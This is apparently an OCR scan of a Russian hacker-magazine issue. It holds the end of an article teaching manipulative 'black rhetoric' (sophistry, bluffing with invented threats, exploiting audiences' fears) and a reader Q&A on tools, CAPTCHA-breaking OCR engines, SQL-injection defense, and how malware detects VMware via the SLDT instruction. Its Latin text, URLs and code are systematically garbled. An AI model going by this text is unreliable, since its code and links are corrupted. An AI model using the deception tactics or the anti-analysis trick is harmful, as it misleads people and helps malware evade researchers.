можетсказать: «Стоп-стоп, я не понял, разъяс- 
ни значение этого термина». Даже если кто-то 
и осмелится, то 1 -2 раза смотрится нормально. 
Но если он будет переспрашивать каждые 1 0 
минут — это выглядит смешно. 

Во-вторых, это подчеркнеттвой профессиона- 
лизм и компетенцию в обсуждаемом вопросе. 
Обычные слова в иностранном варианте тоже 
рулят. Под словами иностранного происхожде- 
нияяимеюв виду не «сенкс, плиз, рандом, 
сорри, хай, тру», а что-то более экстравагант- 
ное, полилитеральное, комплицирующее 
семантическую и лексическую адаптацию ин- 
дивидуума в обсуждаемых вопросах, например, 
бизнес эвалюэйшн или эппрайзал аппроуч. 
Надеюсь, ты понял. Ибо, если не понял —то 
ты на собственном примере ощутил, как будет 



чувствовать себя твой оппонент, когда ты при- 
менишь прием использования специфической 
терминологии. 

Софистика 

Очень радует способ обхода объективной 
реальности с помощью псевдологических 
конструкций, другими словами, «гибкость 
понятий, примененная субъективно» ©Ленин. 
Применяя софистику, ты можешь обосновать, 
что черное — это белое, и наоборот. Самый 
простой и популярный пример софизма: «То, 
что ты нетерял,ты имеешь. Рогаты нетерял. 
Значит,утебя есть рога». Вроде бы все логич- 
но, но в итоге — ерунда какая-то. Логичными в 
софизмах доводы кажутся потому, что они вы- 
рваны из контекста, или закономерности одной 
группы применяются кдругой. В основетакой 
логической ошибки лежит непроверен ность 
одного из суждений, и в дальнейшем результат 
логической цепочки противоречит истине. 
Часто ксофистическим ловушкам прибегают 
журналисты (для создания слона из мухи или 
сенсации из пустого места) и адвокаты (для 
оправдания подзащитных). Один из наиболее 
ярких случаев — это судебное разбирательство 
по делу скандала Киркорова и Ароян (да-да, 
тот, после которого журналисты начали ассо- 
циироваться с розовыми кофточками). После 
привлечения филологов и лексикографов 



выяснилось, что оскорбление вовсе не было 
оскорблением. В заключении фигурировали 5 
пунктов доказательств: 1 . Оскорбление — это 
речевой акте использованием неприличных 
слов, направленный на конкретное лицо и 
приписывающий ему отрицательную харак- 
теристику. В следующих четырех пунктах 
обосновывалось, что выражения «раздра- 
жают сиськи, кофточка и микрофон», «да мне 
по-х...», «п..да» не являются приписыванием 
негативной оценки, а если и являются, то это 
выражено в приличных словах, а неприлич- 
ные слова не адресуются конкретно му лицу, 
являясь всего лишь рифмой к реплике жертвы, 
также толкуются двояко, а часть из них вообще 
простонародные, а не оскорбительные... 
Логическая ошибка состоит в том, что в понятие 
оскорбления включены все перечисленные 
признаки (отрицательная характеристика, не- 
приличные слова и т.п.) в совокупности, и, раз 
они были по отдельности, то в целом оскорбле- 
нием не являются. 

Однако обвинительоказался не дураком и 
сразу распознал злоупотребление софизмами. 
Он доказал псевдонаучность каждого из при- 
веденных доказательств, под конец парировав 
тем, что оскорбление в виде плевка в лицо не 
содержитни одной из перечисленныххарак- 
теристик. В подобного рода спорах кто умнее 
— ТОТИ прав :). 
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ВНУШЕНИЕ 

Результат этих двух видов воздействия один и тот же — добиться от человека чего- 
то. В чем разница? Убеждение — воздействие на сознание людей, обращенное к 
их собственному критическому восприятию. Внушение — воздействие на сознание 
человека, при котором происходит некритичное восприятие получаемой информации. 
Как видишь, дело в критичности/некритичности восприятия. В дальнейшем установ- 
ки, внедренные с помощью убеждения, контролировать легче, чем те, что были при- 
внесены способом внушения. 




Молчание 

как сильнейший довод 

Иногда просто осмысленный взгляд и много- 
значительное молчание более эффективны, 
чем красноречивые доводы. Молчание — это 
вообще сильное оружие в любом разговоре. 
Когда ты молчишь, противник не знает, что 
думать: ты согласен или нет, готовишь на- 
падение или сканируешь его речь и ищешь 
ошибки. У многих людей есть хроническая 
непереносимость длинных пауз, они во что 
бы то ни стало пытаются ее заполнить чем 
угодно, при этом могут проговориться и выдать 
скрываемую информацию или необдуманно 
согласиться на невыгодную для себя по- 
зицию. Но то, что они выпадут на стрем или 
почувствуют себя неловко — это 1 00%. Также, 
если утебя нетаргументов, молчание может 
разрулить ситуацию: придлинной паузеутебя 
есть время на обдумывание и амортизацию, 
а у собеседника — время засомневаться в 
сказанном и прийти в замешательство, вы- 
званноетвоим молчанием. Что касается пауз 
— они помогают логически разделитьтекст и 
дают слушателю время на отдых и усвоение 
информации, речь не так нагружает. Пере- 
гибать палку с паузами не стоит — это сильно 
напрягает. 

облить молоком 
и поджечь 

Другими словами — сбить столку. Вот несколь- 
ко действенных приемов. 

• Задать много вопросов сразу: «Как работает 
эта программа? Кстати, на нее есть лицензия? 
Атоже самое, но на ВеІрЫ, напишете?» Чел 
теряется и не знает, на какой вопрос ему от- 
вечать в первую очередь. 

• Чтобы сбить выступающего с мысли, от- 
лично катит прием несоответствия слов и 
реакции на них. Одни ребята такприкалы- 
вались: они ходили на пресс-конференции, 
презентации, и когда наступало время 
журналистов, сумным видом и блокноти- 
ком задавали вопросы типа «Человек за 
час выпивает 2 литра пива. За сколько он 
выпьет бочку, если не учитывать время, 
необходимое ему, чтобы сходить в туалет?» 

И включали секундомер. Видлица офигев- 
шего оратора стоиттого, чтобы рискнуть 
попробовать то же самое. 

• Перебивание. Когда видишь, что человек 
сделал вдох, чтобы начать речь, опереди его и 
задай какой-нибудь несущественный вопрос 
или кинь забавную реплику. 



Смена ролей 

При общении каждый из нас временно играет 
какую-то роль: продавца, обвиняющего, лиде- 
ра, человека, зависимого от чужого решения. 
Второй, соответственно, подстраивается под 
взаимодополняющую роль. Кстати, не факт, 
что ты сам выбираешь позицию — ее может 
выбрать более активный собеседник, а тебеуже 
останется только подзеркаливатьего. И вот, вы 
по накатанной отыгрываете свои сценарии (по- 
читай по этой теме Эрика Берна «Игры, в кото- 
рые и грают люди»); шаг влево — шагвправоне 
допускается, так как это уже будет другая игра. 

И многие из нас играютневыгодныедля них 
роли, даже не представляя, что можно просто 
сменить образ или игру, осознавая, что делаешь 
в данный момент. При этом «напарник» по игре, 
если он менее осознан и действует на автомате, 
после некоторого замешательства перейдет в 
другой образ, предложенный тобой. Например, 
утебя есть какая-нибудь созданная собствен- 
норучно отличная программа, и есть клиент, 
который вроде бы не против ее купить, но он тя- 
нет, сомневается... Другими словами, вы сейчас 
играете в игру «продавец — покупатель», где ты 
занимаешь пассивную позицию — ждешь, а он 
активную — решает, брать или нет. А что мешает 
тебе сменить роли? Вместо того, чтобы ждать 
его решения, ты сам ставишьусловия: «Хм... 

Это приватный софт. Не знаю, могу ли я быть 
уверен, что ты не сольешь его в паблик?». И 
пустьтеперь он доказывает, что «достоин» этой 
программы. Прием работает, если утебя есть 
возможность решать или выбирать. 

Прицел на целевзло 
аудиторию 

Когда ты строишь речь, чтобы убедить кого-то 
в чем-то, всегда учитывай то, к кому обращены 
твои слова — для каждой цели выбирай свое 
оружие. Например, молодые и среднего воз- 
раста женщины любят флирт и заигрывания 
— кто-то будет кокетничать в ответ, кто-то будет 
строить из себя недотрогу, но всем им это нра- 
вится. Для людей с операционным мышлением 
(программисты, ІТ-шники) создай идеаль- 
ную схему, так как расписывание красочных 
образов — не факт, что подействует; нужны 
исходные данные, цель, пути достижения и 
алгоритм действия предложенной схемы. 
Чтобы добиться поддержки пенсионеров, тебе 
нужен образ внешнего врага, с которым вы все 
вместе будете фанатично бороться и выводить 
на чистую воду. Пенсионеры от этого реально 
тащатся. 



Блеф + ультиматум 

Этот прием лучше не использовать где и как 
попало, ведь если кто-то после спора решит 
проверить истинность твоих угроз, ты рис- 
куешь надолго приобрести статус балабола. 

Он может сработать хорошо, нотолько при 
подходящих обстоятельствах, например, если 
ты видишь, что противниксомневается и не 
уверен в своей точке зрения (а это уже признак 
того, что уязвимости в позиции есть), если 
ты точно знаешь, что оппонент не владеет 
информацией. 

Приведу пример, описанный автором книги 
«Черная риторика» Карстеном Бредемайером. 
Он должен был проводить для сотрудников 
компании семинар по внедрению новой 
стратегии. Все собрались в пятницу на выезде, 
но оказалось, что финансовый директор, пла- 
нировавший внедрить стратегию, был уволен. 
Работники обрадовались, что можно будет по- 
раньше уйти домой; особенно бушевали двое 
лидеров, подбивавших всех на «революцию». 
Они намекали на то, что если коуч настоит на 
проведении семинара, то тренинг получит 
плохую оценку, что негативно скажется на 
его карьере. Бредемайер предложил сделать 
кофе-брейк. Во время перерыва он отвел 
парочку зачинщиков в сторону и сказал: «Итак, 
дорогие мои, сейчас мы сыграем партию в 
покер. Вариант первый: мы проводим тренинг, 
вы пишете на меня жалобу или негативную 
рецензию, и все разъезжаются по домам. 

В свою очередь, я тоже приезжаю домой, в 
понедельникутром звоню вашему директору 

— предположим, яснимхорошознакомлично, 

— и сообщаю о двух сотрудниках, пытающихся 
подорвать репутацию и финансовое разви- 
тие фирмы вугоду своим амбициям. Второй 
вариант: мы проводим тренингтак, как было 
запланировано, и я забуду о вашем поведении. 
Но при этом вы пообещаете мне поддержку и 
содействие во время семинара. Итак, через 
две минуты мы либо сидим в аудитории, либо 
разъезжаемся по домам. Решение за вами». 

На то время автор истории не был знаком с 
директором, он познакомился с ним только 

в понедельник, послеудачно проведенного се- 
минара. Нотогда, в критический момент, никто 
этого проверить не мог. 

Лучше, если при постановке ультиматума 
в выгодном для тебя варианте будеттакже 
что-то привлекательное для твоего против- 
ника, будетлегче склонить его к нужномутебе 
решению. 

И еще: чем раньше ты начнешь свой блеф — 
тем лучше, так как соперник не успеет подгото- 
виться информационно и морально. 

Черная риторика 
в профессиональной 
практике 

Чаще всего используют приемы убеждения 
юристы, коучи, консультанты, психологи. Давай 
промониторим основные принципы, которым 
они следуют. 
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Например, в юридической практике есть 
негласные правила, по которым адвокат или 
прокурор должен строить свою речь (думаю, 
они пригодятся и тебе): 

• выгодная аргументация событий, но обяза- 
тельно с фактами, на которые можно опираться, 
пусть даже они будут малозначительными; 

• речь должна содержать одну стержневую идею, 
а все остальные факты — вращаться вокруг нее; 

• ориентация на судью: оптимальное соотно- 
шение пауз, повторов, равномерный темп, чет- 
кая и лаконичная речь, в меру эмоциональная; 
метафоры допускаются в личных делах, если же 
дело рассматривается в хозяйственном суде, 
то они противопоказаны, так как могут быть 
истолкованы превратно; 

• аргументация должна быть построена так, 
чтобы другая сторона не могла их опровергнуть; 
пусть аргументов будет меньше, но они должны 
быть весомыми. Асамый основной подавать 
тогда, когда судья готов будет его воспринять. 

Кинематограф 

Вотживой пример из фильма «Здесь курят». 
Первая сцена: ведущая телешоу показывает 
лысого онко-больного мальчика со словами 
«Он больше не считает, что сигареты — это 
круто». Эмоциональное якорение — «сигареты 
= рак», в итоге — «посмотрите, кчему привело 
курение». В одном из предыдущих номеров мы 
говорили отом, что при сильном эмоциональ- 
ном воздействии логика перестает работать. 
Рядом сидят представители организаций, 
борющихся с курением и ратующихза здоровый 
образ жизни. Как выкручивается Аарон Экхарт, 
главный герой, РР-агенткрупнойтабачной 
компании? «Нашей компании невыгодно, чтобы 
этотмальчикумирал. Более того, мы потеряем 
покупателей. Наша выгода втом, чтобы мальчик 
жил долго и курил». Включается логика... А ведь 
действительно, невыгодно. Отличная подмена 
СМЫСЛОВ: «Табачная компания несетсмерть 
курильщикам» против «Табачной компании 
выгодно, чтобы курящие жили долго». Кто 
возразит? :) Суть приема втом, что абстрактно- 
социальная установка была разбита наглядным 
и логичным аргументом. «Крометого, — про- 
должает великий оратор, — смерть этого 
ребенка выгодна организациям здоровья — для 



саморекламы — они получают на этом деньги. А 
мы в ближайшее время собираемся запустить 
пятидесятимиллионную кампанию по отучению 
детей от курения. Думаю, все со мной согласят- 
ся, что нетничего важнее, чем здоровье наших 
детей». Это вообще жесть! Теперь оказывается, 
что организация по заботе о здоровье — это 
главный врагздоровья, атабачная компания 
заботится о будущем американских детей. 
Приемы: 

• «думаю, все со мной согласятся» — автомати- 
ческое присоединение мнения толпы; 

• демонстрация заботы о здоровом будущем 
детей. Очень благородная цель, социальные 
нормы ее поощряют, естественно, публика при- 
соединилась к его мнению; 

• логически (не фактически) подкрепленное 
обвинение в адрес оппонента. Кстати, про- 
тивник ничего кроме «Да как Вы смеете...» 
возразить не смог; 

• заявлениеобО-миллионной кампании оказа- 
лось блефом, но обещание головокружительного 
успеха («Пресса уже в восторге. Вы мне еще «спа- 
сибо» скажете!») помогло переубедить босса. 

Чуть выше, чем просто 
слова. Игра смыслами 

Каждый профессиональный психолог(атеперь 
и ты) знает, что почти любое явление или образ 
имеет не одну, а две или даже больше сторон: 
белую, черную и массу других промежуточных 
оттенков. Вотбанальный пример: слушаться 
родителей — это хорошо или плохо? 

Первая точка зрения — хорошо: 

1 . родители плохого не посоветуют; 

2 . у родителей больше опыта; 

3 . родители несут ответственность за своих детей. 
Вторая точка зрения — плохо: 

1 . родители знают, что хорошо для них, но от- 
куда они знают, что хорошо для тебя? 

2 . у родителей свой опыт, он был полезен при 
тех временах и обстоятельствах, в которых 
жили они. Родители уверены, что в нашем веке 
посещение библиотеки принесеттебе больше 
профита, чем прохождениетренинга по пикапу? 

3 . постоянно перекладывая ответственность 
за детей на себя, родители рискуют воспитать 
взрослого ребенка, не способного шагу сделать 
самостоятельно и отвечать за свои поступки... 



Если ты до сих пор не понял, к чему я клоню, 
скажу прямо — любой аргумент оппонента ты 
можешь рассмотреть с другой точки зрения, 
придать ему другой смысл, и тогда глобальные 
вопросы окажутся по сути незначительными в 
контексте твоей перспективы (аргумент«Выс- 
шее образование необходимо!» — контраргу- 
мент «Необходимо образование или знания?»); 
негатив превратится в позитив (аргумент 
«Кризис, все плохо» — контраргумент«Кризис 

— это всегда начало нового этапа развития» 
или «Наконецу нас есть время подумать, тем ли 
мы занимаемся, чем хотим»). 

Кстати, политики и журналисты часто исполь- 
зуют этот хитрый прием, подменяя привыч- 
ные нам стереотипы новыми. 

АОЕ — создатели роликов «Іпіегпеі; із а дооб 
іЫпд» и «Іпіегпеі; із а баб іЫпд» (поищи на 
УоиТиЬе по одноименному названию) по- 
казали нам, каклегко можно манипулировать 
нашим мнением. 

Интернет — это хорошо. Столько информации, 
сколько хранится в интернете, не найти ни в 
одной библиотеке, это мощная база для обра- 
зования. Все новости мы узнаем оттуда, в том 
числе, если жертвам какого-либо бедствия 
нужна поддержка; часто они получают ее бла- 
годаря огласке в Сети. Свобода слова — это 
огромное преимущество. Мы можем свободно 
общаться и видеть друг друга, находясь на 
полярныхточках планеты; сколько пар было 
создано благодаря интернету... Это часть нас. 
Интернет — это плохо. Благодаря интернету 
кто-то планирует и совершает преступные дей- 
ствия; собирая данные ожертве, получает воз- 
можность для нанесения сокрушающего удара. 
В интернете можно купить все, что угодно, в 
том числе детей или человеческие органы для 
трансплантации. Благодаря ему мы находимся 
под постоянным наблюдением веб-камер, кто- 
то, возможно, читает нашу переписку, где мы 
говорим оличном... Сетьзабираетнашужизнь, 
превращая ее в очередную матрицу. 

На самом деле, если ты научишься играть 
смыслами, тебе не нужны навыки красноречия, 

— иногда мировоззрение можно сломатьодним 
продуманным и вовремя сказанным словом. 

в заключение 

Черная риторика — это не просто набор прие- 
мов, применяя которые, ты сможешьубедить 
Папу Римского прийти на вечеринку к сатан и- 
стам. Это опыт, приобретенный методом проб и 
ошибок; нужно чувствование собеседника, ви- 
дение его слабых и сильных мест, уязвимостей 
мировоззрения, нужен развитый интеллект, 
тренировка, оттачивание мастерства. Чтобы 
стать мастером слова и мысли, читай литера- 
туру для журналистов, РР-щиков (особенно 
черный РР, Антон Вуйма), книги по искусству 
убеждения, смотри фильмы и запоминай наи- 
более понравившиеся амортизации, бери их 
на вооружение. И каждый день реализуй это на 
практике. При таком подходе успех постепенно 
придет. А еще читай ][ — у многихавторов можно 
поучиться красноречию :).^-^ 
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О: Крис Касперски в свое время приводил 
дельный способ урезать ѴѴіпсІоѵѵз — удалить 
все файлы, у которых дата и время обращения к 
ним не отличаются от даты установки системы. 

Я попытался написать прогу, которая делала бы 
это автоматически, но, как оказалось, извлечь 
МАС (МосІіПесІ, Ассезз, апсі СЬапде) — не такая 
тривиальная задача. Обычные функции для 
управления файлами с этим справиться не могут. 
Как быть? 

А: Если тебя не переполняет желание ковы- 
ряться стаблицей МЕТ и ее структурами (а 
там есть подводные камни, поверь мне), то 
лучше в качестве помощника использовать 
утилиту тас-гоЬЬег [ ѵѵѵѵѵѵ.зІеиіЬкіЕога ]. 

Тулза гшас-гоЬЬег четко занимается тем, что 
считывает атрибут МАС для всех файлов в 
системе. Ктомуже она написана автором из- 
вестного набора приложений ТЬе 51еи1:Ь КИ; 
(Т5К), предназначенных для самого подроб- 
ного изучения жесткого диска. Они тебе тоже 
пригодятся: если все же захочешь поковы- 
ряться с МЕТ, то для лучшего понимания хо- 
рошо бы сначала поработать со структуриро- 
ванными отчетами, который подготовятТЗК 



и прога РгоОізсоѵег [ ѵѵѵѵѵѵ.ІесЬраіЬѵѵаѵз.сопп/ 
РезкІ:орРе1'аии.азрх?І:аЬіпсІех=3&І:аЬісІ = 1 2] . 

О: Как проще всего установить модуль к 
РуІЬоп'у? 

А: Для того, чтобы скачать, собрать, устано- 
вить или обновить модули, есть специальный 
инструментзеШрІооІз. Необходимые инструк- 
ции и файлы-инсталляторы для разных ОСты 
всегда найдешь на сайте рѵрі.рѵШоп.огд/рѵрі/ 
зеіиріооіз . Под виндой подключения нового 
модуля к интерпретатору выглядит следующим 
образом: 

1 . После установки зеіиріооіз в папке со сце- 
нариями утебя появляется скрипт еазу_іпз1:аи, 
атакже его скомпилированная версия в виде 
ехе’шника. Название говорит само за себя — 
решение используется для простой инсталля- 
ции новых модулей. Это как менеджер пакетов 
для системы. 

2 . С этого момента любой модуль устанав- 
ливается простой командой через консоль: 
еазу_іпз1:аи [название модуля]. В этом случае 
все необходимые файлы закачиваются из репо- 
зитория. Помимо этого, можноуказать ссылку 



на архив и/или едд-пакет [специальный формат 
для библиотек РуШоп] с модулем: 

еазу_іпзСа11 ехатріе . сот/раШі/До/ 
МуРаскаде-1 .2.3. Ддз . 

О: Как проще всего определить, что РОР-файл 
заражен, не заморачиваясь с хитрыми утилита- 
ми, которые не дают четкого ответа, а выплевы- 
вают промежуточную информацию для анализа 
специалистом. Хочу простого ответа — заражен 
файл или нет. 

А: Самый простой инструмент в этом плане 
— утилита РРР5саппег[ Ыодз.рагеІ:о[одіс. 
сот/таІѵѵагесІіагіез/СЕ РРР Эсаппег.тір ]. На 
вход ей подается документ в формате РОЕ, а на 
выходе она выдает один изтрех вердиктов: 

1 . «по1;Ыпд ІоипсІ» [файл чист); 

2 . «роіепбаі гізк — ЗаѵаЭсгірІ; собе» [в файле 
есть 35-вставки, которые могут быть опасны); 

3 . «зизрісіоизбіе» [файл содержитопасные 
вставки, используемые, какправило, малва- 
рью). Если есть желание поэкспериментиро- 
вать, попробуй скормить программе пару «пло- 
хих» файлов с зараженных доменов из списка. 
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обновляемого на сайтах таіѵѵагесіоппаіпіізі:. 
сот и тсІІ.рагеЫоаіс.сопп . 

О: Говорят, в чате 5куре есть команды а-ля ІРС. 
Так ли это? 

А: На самом деле чат в 5куре — это почти тотже 
самый ІНС-канал. Многие средства для управ- 
ления каналом реализованы в самом 61Л-ин- 
терфейсе, но некоторые вещи можно сделать 
только с помощью специальных команд. Ниже 
— наиболее важные из них: 

/адіді [изегпате] —добавить пользователя 
изегпате кчату. 

/Іеаѵе — покинуть чат. 

/Соріс [СехС] — установитьтопикканала. 

/деС диісіеііпез — просмотр такназываемых 
диібеііпе'овдоестьправил чата 
/кіск [изегпате] —удаление пользователя 
из чата. 

/кіскЬап [изегпате] —собственно, кіск и 
бан. 

/зеС и /зеС ЬапІізС —управление списком 
пользователей, которым запрещено присоеди- 
няться кчату. 

/зеС и /деС аІІоѵ^ІізЦ —управлением 
списком пользователей, которым разрешено 
присоединяться кчату. 

/зеСгоІе [изегпате] МАЗТЕК | ЕЗЕЕ | 
ЕІЗТЕЕЕЕ — установка определенной роли для 
пользователя. 

Последняя команда требуетпояснения: что озна- 
чают роли в 5куре? СНЕАТОН и МА5ТЕН — это что- 
то вроде модераторов. Н5ЕЕ — самый обычный 
пользователь чата. ЕІЗТЕМЕЕ - юзер, который 
участвует в чате в режиме «только чтение». 

О: Во многих местах стал встречать векторные 
графики и рисунки, которые здорово выглядят 
и при этом созданы без применения РІазИ- и 
ЗіІѵегІідЫ-технологий. Все, что используется — 
^аѵа5сгір(. Но неужели все это пишется с нуля? 

А: Специально для того, чтобы упростить работу 
с векторной графикой, разработан приятный 
фреймворк РарЬаеІ [ гарЬаеУз.сот ]. Разработ- 
ка учитывает рекомендации ѴѴ36 по формату 
5Ѵ6, атакже использует стандартизированный 
Ѵесіог Магкир Еапдиаде (языквекторной раз- 
метки). Это означает, что любой графический 
объект, созданный с помощью РарЬаеІ, являет- 
ся привычным ООМ-объектом. Ты можешь 
легко обращаться кнему излюбого ЗаѵаЭсгірІ:- 
сценария, назначать обработки событий — 
короче говоря, без проблем использовать его. 
Для примера создадим на странице окружность 
красного цвета: 

// Создаем полотно для рисунка 32 0 х 
2 00 в начальной точке с координатами 
10, 50 

ѵаг рарег = Еаркаеі ( 10 , 50, 32 0, 

200 ) ; 

// Рисуем на полотне окружность в х,у 

= (50, 40) и радиусом =10 

ѵаг сігсіе = рарег . сігсіе ( 50 , 40, 

10 ) ; 

// Заливаем окружность красным (цве- 




Мощный инструмент для детально изучения информации на НОВ 



том #10 0) 

сігсіе . аСЕг ( " 1і11 ", " #100 " ) ; 

Ни на грамм не сложнее создать с помощью 
На рЬаеІ любую другую фигуру, а потом манипу- 
лировать ею. Столь простой подход позволяет, 
например, реализовать красивые динамичес- 
кие графики и диаграммы, используя чистый 
ОаѵаЭсгірІ: втой области, где традиционно 
использовался ЕІазЬ. Это общийтренд техно- 
логии НТМЕ 5. 

О: Можно ли по РСАР-дампу сотснифанным в 
локалкетрафиком построить схему локальной 
сети? 

А: Если речь идето сложной сети, то, веро- 
ятнее всего — нет. Но эти данные могут стать 
отличной отправной точкой для анализа. 

По крайней мере, они содержат да иные о 
валидных диапазонах ІР-адресов. Кстати, авто- 
матизировать сбор данных о локальной сети, 
имея дамп с трафиком, умеет перловый скрипт 
пѵѵтар [ пѵѵтар.зоигсеіогде.пеі: ). Для работы 
ему потребуется установленный сканер Мтар и 
снифферТзЬагк. 

О: Дано: етЬесІсІесІ-девайс, который надо пе- 
репрошить. По идее, можно кинуть на флешку 
файл с прошивкой и вставить его в НЭВ-разъем 
устройства. Однако девайс ее почему-то не ви- 
дит. Первая мысль — флешка на МТЕ5, поэтому, 
наверное, и не может прочитаться. Но, отфор- 
матировав в ЕАТ с помощью винды, ятакничего 
не добился. Есть идеи, как решить проблему? 

А: Скорее всего, девайс понимаеттолько ЕАТ/ 
ЕАТ32. Чтобы правильно отформатировать 
флешку, часто недостаточно встроенного в 
винду. А вот кто точно справится — это утилиты 
НР 05В Оізк Эіогаде ЕогтаіТооІ или РЕ205В. У 



них нет домашних страниц, но би парники легко 
ищутся через Ооодіе. 

О: Экспериментируя с малварью, уперся в тупик. 
Тело загрузчика определяет, что запущено 
в виртуальном окружении (я юзаю ѴМѵѵаге 
ѴѴогк5(а(іоп) и не заражает систему. Меня 
интересует методика. Хочу также использовать 
подобные механизмы в своих разработках. 

Есть ли конкретные рецепты, как определить 
присутствие виртуалки? 

А: Многие загрузчики проверяют, выполняются 
ли они в среде виртуальной машины, просто 
считывая содержимое регистра ЕВТВ. В нем 
содержится селектор сегмента, в котором рас- 
полагается локальная таблица дескрипторов 
сегмента, необходимая для вычисления линей- 
ного адреса из пары «селектор сегмента — сме- 
щение». Сама ѴѴіпсІоѵѵз давно не использует 
локальные таблицы дескрипторов сегментов, 
и поэтому заполняет регистр ЕВТВ нулевым 
значением. А вот виртуальные машины, втом 
числе ѴМѵѵаге — используют. Получается сов- 
сем простая проверка: есть значение регистра 
ЕВТВ, отличное от нуля, значит, выполнение 
процесса осуществляется в виртуальном 
окружении. Ктомуже для получения значения 
регистра используется инструкция 5ЕВТ (Эіоге 
Еосаі ВезсгірІогТаЫе Ведізіег), которая не 
является привилегированной и поэтому может 
быть выполнена в гіпд-3 любым приложением. 
Резюме вышесказанного: для определения 
виртуалки программе достаточно вызвать 
инструкцию 5ЕВТ и посмотреть, отличается ли 
полученное значение от нуля. 

О: Заметил следующий факт: многие самодель- 
ные САРТСНА совершенно нечитаемы. Абсо- 
лютно непонятно, какой конкретно изображен 
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символ : то ли это I, то ли 1 , то л и I. Получается, 
разрабатывая свою капчу, лучше вообще вовре- 
мя исключить эти символы? 

0: За основу лучше всего взять следующий 
диапазон символов: [А-2][а-2][0-9] и дальше 
исключать из него проблемные элементы. 
Многое зависит оталгоритма и, в частности, 
от используемого шрифта: он может быть с 
засечками или без них, и это сильно повлияет 
на читаемость. Главная проблема втом, что 
после деформаций, искажений и накладыва- 
ния шумов многие буквы сложно однозначно 
идентифицировать. Например: 

• «[», «1 », «I» — все символы слишком похожи 
друг на друга; 

•«ѴѴ», «\л/» — «ѵѵ» очень просто спутатьс«ѵ» или «ѵѵ»; 

• «О», «О», «О» — очень похожи, особенно если 
на капче добавляются шумы; 

•«д», «9» — практически один символ, особен- 
но после деформации; 

•«3»,«8» — могугбытьспутаны другсдругом и«В»; 
•«4» — часто похожа на «А»; 

•«5» — при наклоне неотличим от«5»; 

• «Г» — после наклона может быть спутан с «V»; 
•«г» — может быть перепутан с«п»; 

•«б» — после скручивания похоже на «п»; 

• «У», у», «V» — часто неотличимы после 
деформаций. 

Но даже если вообще исключитьэти сим- 
волы, построить надежную капчу более чем 
возможно. 

0: Мне очень понравилась ваша статья про взлом 
САРТСНА. Но все-таки, если не писать самому 
нейронную сеть и не обучать ее, не реали- 
зовывать сложные алгоритмы, ковыряясь в 
премудростях ОСР, есть ли какие-нибудь движки 
для распознавания, которые могли бы помочь во 
взломе САРТСНА? 

А: По большому счету, нужно то же самое, что 
и для оцифровки обычного текста, то есть эф- 
фективное ОСН-решение. Технологий, которые 
открыты, бесплатны и при этом даже работают, 
нетакмного. 

60СР ( Іосг.зоигсеі'огае.пеі: ) — предельно прос- 
той и открытый ОСН-пакет, которому не нужно 



обучение. Работаеточень быстро, но нетак 
точно, как другие более сложные движки. 
Теззегасі [ сосІе.аооаІе.сопп/рДеггегасІ-осг ] 

— другой бесплатный ОСР-движок, который 
разрабатывался компанией НР с 1 985 по 1 995 
год. Для того, чтобы начать распознавание, 
потребуется более сложная настройка, но и 
результат будет намного точнее, чем у 60СР. 
осгориз [ сосіе.аооаіе.сопп/р/осгориз ) — а это 
уже основанная на Теззегасі: система для рас- 
познаваниятекста, но отлюбимого и одновре- 
менно нелюбимого боодіе :). Проектеще моло- 
дой, ноуже сейчас легко интегрируемый в своих 
решениях, который очень неплохо работают, 
батега [ 1с1р.[1Ьгагу.|би.ес1и/рго]ес1:5/даппега ) — 
это не просто движок, а целый фреймворкдля 
написания систем эффективного распознава- 
ния сложных образов (втом числе САРТСНА), 
который несложно заставить работать. 

0: Подскажи простой, но надежный способ защи- 
титься от501-инъекций. 

А: Один из самых эффективных способов (ну, кро- 
метолковой головы программиста) являютсятак 
называемые файерволы для веб-приложений. У 
нас был подробный материал о ѴѴАР в одном из 
номеров И ( ѵѵѵѵѵѵ.хакер.ги/ппада2Іпе/ха/1 30/056/1 . 
азр ). Но если говорить о надежном и, в тоже 
время, простом способеуберечьсвои разработ- 
ки от50Г-инъекций,то следует отметить прием 
Іпіегроіідие. Нетакдавно он был представлен 
Деном Каминским, который стал известен после 
обнаружения серьезной уязвимости втехноло- 
гии 0М5. Общая идея Іпіегроіідие заключается в 
том, чтобы при передаче пользовательскихдан- 
ных в запросе к СУБД фигурировали не открытые 
данные, а зашифрованная в Ьазе64 строка. 

Что это дает? Очень просто — в хеше строки по 
умолчанию отсутствуют специальные символы, 
которые могут привести к инъекции. Что бы 
хакер ни передавал, в запросе будет валидная 
строковая переменная. Для примера посмотрим 
на самый простейший запрос: 

$сопп->диегу ( " зеІесД * :Егот СаЫе 

ѵ/Деге :Епате='^^:Епате; ") ; 




Допустим, что программист — полный олух и никак 
не фильтруети не экранируетзначение $1пате. 
Таким образом, имеем стандартную уязвимость 
501 Іщесбоп. Но если использовать прием 
Іп1:егро[ідие,тодаже притаком раскладе у атакую- 
щего ничего не выйдет. Посмотрим почему: 

$сопп->диегу ( еѵаі (Ь ( ' зеІесД * Тгот 

СаЫе \л?1іеге Тпате='^'^Тпате ; ' ) ) ) ; 

Здесь функция Ь — это функция-обертка для 
подстановки операций Ьазе64-кодирования 
для переменных, отмеченных символами 
После несложных преобразований кбазе дан- 
ных формируется следующий запрос: 

зеІесЦ * Тгот ДаЫе ѵ^Ъеге 

Тпате=Ьб4(і ( " Ѵеіі = " ) 

Здесь-то и видна самая главная фишка этого 
приема. Какое бы значение не было у перемен- 
ной Іпате (даже если оно никак не фильтрует- 
ся, и хакертуда поставил спецсимволы), при 
обращении к СУБД она всегда будет представ- 
лена безобидной строкой-хешем, а значит, воз- 
можность инъекции исключена. Оригинальная 
презентация отавтора подхода с более подроб- 
ным описанием доступна на ѵѵѵѵѵѵ.зсгіЬсІ.сопп/ 
сІос/33001 026/1 піегроіідие . Оттуда, в частности, 
можно почерпнуть функции для обработки строк 
Ьазе64 в МуЗОО. В другой популярной СУБД — 
РозІдгеЗОІ — поддержка Ьазе64 реализована 
через штатные функции епсобе/сіесосіе. 

0: Что такое 5Н5Н, если говорить об іРЬопе/іРасІ, 
и почему рекомендуют его сохранять? Как это 
сделать? 

А:Арр1е — этооченьумная компания, которая ду- 
мает нетолько о качестве своей продукции, но и о 
том, какеезащитить. Любой девайс можно обно- 
вить, но при этом поумолчанию нет возможности 
вернуть прошивку назад. Это может сыграть злую 
ш^ку, если в новой бгтѵѵаге Арріе реализует 
какую- ни будь хитрую защиту, предотвратив воз- 
можность сделать ЗаіІЬгеак (доступ ксистемным 
файлам и полная свобода действия на устройст- 
ве). При попытке прошитьіРбопе, іРобТоисб или 
іРаб, программа іТипез обращается на сервер 
